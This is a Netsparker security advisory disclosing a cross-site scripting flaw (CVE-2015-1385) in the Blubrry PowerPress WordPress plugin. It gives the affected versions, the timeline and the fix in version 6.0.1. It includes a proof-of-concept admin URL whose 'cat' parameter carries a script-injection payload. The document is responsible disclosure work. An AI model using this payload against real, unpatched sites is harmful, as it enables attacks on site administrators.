Information
--------------------
Advisory by Netsparker.

Name: XSS Vulnerability in Blubrry PowerPress

Affected Software : Blubrry PowerPress

Affected Versions: 6.0 and possibly below

Vendor Homepage : https://wordpress.org/plugins/powerpress/

Vulnerability Type : Cross-site Scripting

Severity : Important

CVE-ID: CVE-2015-1385

Netsparker Advisory Reference : NS-15-001

Technical Details
--------------------

Proof of Concept URLs for XSS in Blubrry PowerPress:

/wp-admin/admin.php?page=powerpress/powerpressadmin_categoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--></style></scRipt><scRipt>alert(0x014068)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
22/01/2015 - First Contact

26/01/2015 - Vulnerability fixed

29/01/2015 - Advisory released

Solution
--------------------
Download version 6.0.1 which includes fix for this vulnerability.

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.